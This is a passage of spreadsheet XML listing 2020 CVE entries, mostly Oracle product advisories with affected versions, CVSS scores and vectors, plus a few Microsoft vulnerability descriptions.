    <t>Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 4.9 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14623</t>
  </si>
  <si>
    <t>CVE-2020-14624</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: JSON). Supported versions that are affected are 8.0.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625</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via IIOP, T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).</t>
  </si>
  <si>
    <t>CVE-2020-14626</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Analytics Web General). Supported versions that are affected are 5.5.0.0.0, 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks of this vulnerability can result in takeover of Oracle Business Intelligence Enterprise Edition. CVSS 3.1 Base Score 8.1 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H).</t>
  </si>
  <si>
    <t>CVE-2020-14627</t>
  </si>
  <si>
    <t>Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: Query). Supported versions that are affected are 8.56, 8.57 and 8.58.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0-14628</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 5.2.44, prior to 6.0.24 and prior to 6.1.12.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Note: The CVE-2020-14628 is applicable to Windows VM only. CVSS 3.1 Base Score 8.2 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H).</t>
  </si>
  <si>
    <t>CVE-2020-14629</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 5.2.44, prior to 6.0.24 and prior to 6.1.12.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1 Base Score 6.0 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-1463</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in the way that the SharedStream Library handles objects in memory, aka 'Windows SharedStream Library Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-14630</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Enterprise Session Border Controller product of Oracle Communications Applications (component: File Upload). Supported versions that are affected are 8.1.0, 8.2.0 and 8.3.0. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle Enterprise Session Border Controller. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Enterprise Session Border Controller, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle Enterprise Session Border Controller as well as unauthorized update, insert or delete access to some of Oracle Enterprise Session Border Controller accessible data and unauthorized read access to a subset of Oracle Enterprise Session Border Controller accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:H).</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:H</t>
  </si>
  <si>
    <t>CVE-2020-14631</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: Audit). Supported versions that are affected are 8.0.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632</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Options). Supported versions that are affected are 8.0.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633</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 8.0.20 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.1 Base Score 2.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14634</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 8.0.20 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized read access to a subset of MySQL Server accessible data. CVSS 3.1 Base Score 2.7 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14635</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Application Object Library product of Oracle E-Business Suite (component: Logging). Supported versions that are affected are 12.2.5-12.2.9. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Application Object Library. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Application Object Library accessible data. CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14636</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Sample apps). Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticat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1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14637</t>
  </si>
  <si>
    <t>CVE-2020-14638</t>
  </si>
  <si>
    <t>CVE-2020-14639</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Sample apps). Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-1464</t>
  </si>
  <si>
    <t>A spoofing vulnerability exists when Windows incorrectly validates file signatures, aka 'Windows Spoofing Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-14640</t>
  </si>
  <si>
    <t>CVE-2020-14641</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: Roles). Supported versions that are affected are 8.0.20 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all MySQL Server accessible data. CVSS 3.1 Base Score 4.9 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14642</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Coherence product of Oracle Fusion Middleware (component: CacheStore). Supported versions that are affected are 3.7.1.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Coherence. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle Coherence. CVSS 3.1 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).</t>
  </si>
  <si>
    <t>CVE-2020-14643</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: Roles). Supported versions that are affected are 8.0.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5 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:H).</t>
  </si>
  <si>
    <t>CVE-2020-14644</t>
  </si>
  <si>
    <t>CVE-2020-14645</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via IIOP, T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).</t>
  </si>
  <si>
    <t>CVE-2020-14646</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 5.2.44, prior to 6.0.24 and prior to 6.1.12. Difficult to exploit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1 Base Score 7.5 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H).</t>
  </si>
  <si>
    <t>CVE-2020-14647</t>
  </si>
  <si>
    <t>CVE-2020-14648</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 5.2.44, prior to 6.0.24 and prior to 6.1.12. Difficult to exploit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1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:N/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14649</t>
  </si>
  <si>
    <t>CVE-2020-1465</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in Microsoft OneDrive that allows file deletion in arbitrary locations.To exploit the vulnerability, an attacker would first have to log on to the system, aka 'Microsoft OneDrive Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-14650</t>
  </si>
  <si>
    <t>CVE-2020-14651</t>
  </si>
  <si>
    <t>CVE-2020-14652</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle WebLogic Server accessible data as well as unauthorized read access to a subset of Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14653</t>
  </si>
  <si>
    <t>Vulnerability in the Primavera P6 Enterprise Project Portfolio Management product of Oracle Construction and Engineering (component: Web Access). Supported versions that are affected are 16.1.0.0-16.2.20.1, 17.1.0.0-17.12.17.1 and 18.1.0.0-18.8.18.2. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Primavera P6 Enterprise Project Portfolio Management. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Primavera P6 Enterprise Project Portfolio Management accessible data as well as unauthorized read access to a subset of Primavera P6 Enterprise Project Portfolio Management accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14654</t>
  </si>
  <si>
    <t>CVE-2020-14655</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Security Service product of Oracle Fusion Middleware (component: SSL API). Supported versions that are affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTPS to compromise Oracle Security Service. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Security Service accessible data as well as unauthorized update, insert or delete access to some of Oracle Security Service accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14656</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Locking). Supported versions that are affected are 8.0.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657</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle CRM Technical Foundation product of Oracle E-Business Suite (component: Preferences). Supported versions that are affected are 12.1.3 and 12.2.3-12.2.9. Easily exploitable vulnerability allows low privileg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1 Base Score 7.6 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14658</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Marketing product of Oracle E-Business Suite (component: Marketing Administration). Supported versions that are affected are 12.1.1-12.1.3 and 12.2.3-12.2.9. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Marketing. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Marketing accessible data as well as unauthorized access to critical data or complete access to all Oracle Marketing accessible data. CVSS 3.1 Base Score 9.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14659</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle CRM Technical Foundation product of Oracle E-Business Suite (component: Preferences). Supported versions that are affected are 12.1.3 and 12.2.3-12.2.9.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update, insert or delete access to some of Oracle CRM Technical Foundation accessible data. CVSS 3.1 Base Score 4.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-1466</t>
  </si>
  <si>
    <t>CVE-2020-14660</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle CRM Technical Foundation product of Oracle E-Business Suite (component: Preferences). Supported versions that are affected are 12.1.3 and 12.2.3-12.2.9.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1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14661</t>
  </si>
  <si>
    <t>CVE-2020-14662</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Financial Services Analytical Applications Infrastructure product of Oracle Financial Services Applications (component: Infrastructure). Supported versions that are affected are 8.0.6-8.1.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Financial Services Analytical Applications Infrastructure. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Financial Services Analytical Applications Infrastructure accessible data as well as unauthorized read access to a subset of Oracle Financial Services Analytical Applications Infrastructure accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Financial Services Analytical Applications Infrastructure. CVSS 3.1 Base Score 6.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L).</t>
  </si>
  <si>
    <t>CVE-2020-14663</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: Privileges). Supported versions that are affected are 8.0.20 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in takeover of MySQL Server. CVSS 3.1 Base Score 7.2 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H).</t>
  </si>
  <si>
    <t>CVE-2020-14664</t>
  </si>
  <si>
    <t>Vulnerability in the Java SE product of Oracle Java SE (component: JavaFX). The supported version that is affected is Java SE: 8u251. Difficult to exploit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1 Base Score 8.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H).</t>
  </si>
  <si>
    <t>CVE-2020-14665</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Trade Management product of Oracle E-Business Suite (component: Invoice). Supported versions that are affected are 12.1.1-12.1.3 and 12.2.3-12.2.9. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Trade Management. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Trade Management accessible data as well as unauthorized access to critical data or complete access to all Oracle Trade Management accessible data. CVSS 3.1 Base Score 9.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14666</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Email Center product of Oracle E-Business Suite (component: Message Display). Supported versions that are affected are 12.1.1-12.1.3 and 12.2.3-12.2.9. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Email Center. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Email Center, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Email Center accessible data as well as unauthorized update, insert or delete access to some of Oracle Email Center accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14667</t>
  </si>
  <si>
    <t>CVE-2020-14668</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle E-Business Intelligence product of Oracle E-Business Suite (component: DBI Setups). Supported versions that are affected are 12.1.1-12.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle E-Business Intelligence. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle E-Business Intelligence, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle E-Business Intelligence accessible data as well as unauthorized update, insert or delete access to some of Oracle E-Business Intelligence accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14669</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Configurator product of Oracle Supply Chain (component: UI Servlet). Supported versions that are affected are 12.1 and 12.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Configurator. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Configurator, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Configurator accessible data as well as unauthorized update, insert or delete access to some of Oracle Configurator accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-1467</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when Windows improperly handles hard links, aka 'Windows Hard Link Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-14670</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Advanced Outbound Telephony product of Oracle E-Business Suite (component: Settings). Supported versions that are affected are 12.1.1-12.1.3 and 12.2.3-12.2.9. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Advanced Outbound Telephony. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Advanced Outbound Telephony, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Advanced Outbound Telephony accessible data as well as unauthorized update, insert or delete access to some of Oracle Advanced Outbound Telephony accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14671</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Advanced Outbound Telephony product of Oracle E-Business Suite (component: User Interface). Supported versions that are affected are 12.1.1-12.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Advanced Outbound Telephony. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Advanced Outbound Telephony, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Advanced Outbound Telephony accessible data as well as unauthorized update, insert or delete access to some of Oracle Advanced Outbound Telephony accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14672</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Stored Procedure). Supported versions that are affected are 5.6.49 and prior, 5.7.31 and prior and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673</t>
  </si>
  <si>
    <t>CVE-2020-14674</t>
  </si>
  <si>
    <t>CVE-2020-14675</t>
  </si>
  <si>
    <t>CVE-2020-14676</t>
  </si>
  <si>
    <t>CVE-2020-14677</t>
  </si>
  <si>
    <t>CVE-2020-14678</t>
  </si>
  <si>
    <t>CVE-2020-14679</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle CRM Technical Foundation product of Oracle E-Business Suite (component: Preferences). Supported versions that are affected are 12.1.3 and 12.2.3-12.2.9. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle CRM Technical Foundation. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle CRM Technical Foundation. CVSS 3.1 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).</t>
  </si>
  <si>
    <t>CVE-2020-1468</t>
  </si>
  <si>
    <t>CVE-2020-14680</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.20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0-14681</t>
  </si>
  <si>
    <t>CVE-2020-14682</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Depot Repair product of Oracle E-Business Suite (component: Estimate and Actual Charges). Supported versions that are affected are 12.1.1-12.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Depot Repair. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Depot Repair, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Depot Repair accessible data as well as unauthorized update, insert or delete access to some of Oracle Depot Repair accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14684</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Financial Services Analytical Applications Infrastructure product of Oracle Financial Services Applications (component: Infrastructure). Supported versions that are affected are 8.0.6-8.1.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Financial Services Analytical Applications Infrastructure. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Financial Services Analytical Applications Infrastructure accessible data. CVSS 3.1 Base Score 4.3 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14685</t>
  </si>
  <si>
    <t>CVE-2020-14686</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle iSupport product of Oracle E-Business Suite (component: Others). Supported versions that are affected are 12.1.1-12.1.3 and 12.2.3-12.2.9. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle iSupport. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle iSupport, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle iSupport accessible data as well as unauthorized update, insert or delete access to some of Oracle iSupport accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14687</t>
  </si>
  <si>
    <t>CVE-2020-14688</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Common Applications product of Oracle E-Business Suite (component: CRM User Management Framework). Supported versions that are affected are 12.1.3 and 12.2.3-12.2.9. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Common Applications. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Common Applications, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Common Applications accessible data as well as unauthorized update, insert or delete access to some of Oracle Common Applications accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-1469</t>
  </si>
  <si>
    <t>A denial of service vulnerability exists when the .NET implementation of Bond improperly parses input, aka 'Bond Denial of Service Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-14690</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Analytics Actions). Supported versions that are affected are 5.5.0.0.0, 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable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access to critical data or complete access to all Oracle Business Intelligence Enterprise Edition accessible data as well as unauthorized update, insert or delete access to some of Oracle Business Intelligence Enterprise Edition accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14691</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Financial Services Liquidity Risk Management product of Oracle Financial Services Applications (component: User Interface). The supported version that is affected is 8.0.6. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Financial Services Liquidity Risk Management. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Financial Services Liquidity Risk Management accessible data as well as unauthorized read access to a subset of Oracle Financial Services Liquidity Risk Management accessible data. CVSS 3.1 Base Score 7.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14692</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Financial Services Loan Loss Forecasting and Provisioning product of Oracle Financial Services Applications (component: User Interface). Supported versions that are affected are 8.0.6-8.0.8. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Financial Services Loan Loss Forecasting and Provisioning. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Financial Services Loan Loss Forecasting and Provisioning accessible data. CVSS 3.1 Base Score 6.5 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14693</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Insurance Accounting Analyzer product of Oracle Financial Services Applications (component: User Interface). Supported versions that are affected are 8.0.6-8.0.9. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Insurance Accounting Analyzer. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Insurance Accounting Analyzer accessible data. CVSS 3.1 Base Score 6.5 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14694</t>
  </si>
  <si>
    <t>CVE-2020-14695</t>
  </si>
  <si>
    <t>CVE-2020-14696</t>
  </si>
  <si>
